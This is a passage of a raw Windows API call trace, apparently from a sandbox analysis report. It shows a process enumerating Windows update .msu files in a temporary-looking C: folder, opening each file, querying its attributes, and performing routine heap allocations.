lpUsedDefaultChar=0x0) returned 56 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0068.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.781] AreFileApisANSI () returned 1 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0068.781] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75cd8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0068.781] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.781] GetFileType (hFile=0x410) returned 0x1 [0068.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0068.781] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.781] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.782] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.782] CloseHandle (hObject=0x410) returned 1 [0068.782] AreFileApisANSI () returned 1 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0068.782] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x75fa8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0068.782] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.782] GetFileType (hFile=0x410) returned 0x1 [0068.782] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0068.782] CloseHandle (hObject=0x410) returned 1 [0068.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.782] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e2d0 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e2d0 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.783] AreFileApisANSI () returned 1 [0068.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.783] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0068.783] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x76020, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu") returned 56 [0068.783] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.0-KB956250-v6001-x86.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.0-kb956250-v6001-x86.msu"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1bbe7400, ftCreationTime.dwHighDateTime=0x1cac6bf, ftLastAccessTime.dwLowDateTime=0x1bbe7400, ftLastAccessTime.dwHighDateTime=0x1cac6bf, ftLastWriteTime.dwLowDateTime=0x1bbe7400, ftLastWriteTime.dwHighDateTime=0x1cac6bf, nFileSizeHigh=0x0, nFileSizeLow=0x217520)) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0068.783] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.784] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Windows6.1-KB958488-v6001-x64.msu", cAlternateFileName="WINDOW~3.MSU")) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68b30 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b30 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76200 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.784] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0068.784] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76200 | out: hHeap=0x20000) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.784] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0068.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0068.785] AreFileApisANSI () returned 1 [0068.785] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu", lpUsedDefaultChar=0x0) returned 56 [0068.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0068.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.785] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0068.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0068.785] AreFileApisANSI () returned 1 [0068.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.785] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0068.785] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0068.785] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.785] GetFileType (hFile=0x410) returned 0x1 [0068.785] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0068.785] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0068.786] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0068.786] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0068.786] CloseHandle (hObject=0x410) returned 1 [0068.786] AreFileApisANSI () returned 1 [0068.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.786] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0068.786] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75eb8, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0068.786] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x410 [0068.786] GetFileType (hFile=0x410) returned 0x1 [0068.786] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0068.786] CloseHandle (hObject=0x410) returned 1 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d790 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d738 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d738 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d790 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d1b8 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0068.787] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0068.787] AreFileApisANSI () returned 1 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0068.787] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0068.787] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=56 | out: lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu") returned 56 [0068.787] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x64.msu" (normalized: "c:\\588bce7c90097ed212\\windows6.1-kb958488-v6001-x64.msu"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5b8e5700, ftCreationTime.dwHighDateTime=0x1cac6d1, ftLastAccessTime.dwLowDateTime=0x5b8e5700, ftLastAccessTime.dwHighDateTime=0x1cac6d1, ftLastWriteTime.dwLowDateTime=0x5b8e5700, ftLastWriteTime.dwHighDateTime=0x1cac6d1, nFileSizeHigh=0x0, nFileSizeLow=0x4db1ce)) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0068.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.788] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.788] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0ac5d00, ftCreationTime.dwHighDateTime=0x1cac6ce, ftLastAccessTime.dwLowDateTime=0xd0ac5d00, ftLastAccessTime.dwHighDateTime=0x1cac6ce, ftLastWriteTime.dwLowDateTime=0xd0ac5d00, ftLastWriteTime.dwHighDateTime=0x1cac6ce, nFileSizeHigh=0x0, nFileSizeLow=0x20acf9, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="Windows6.1-KB958488-v6001-x86.msu", cAlternateFileName="WINDOW~4.MSU")) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0068.788] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0068.788] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0068.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0068.789] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0068.789] AreFileApisANSI () returned 1 [0068.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\Windows6.1-KB958488-v6001-x86.msu", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 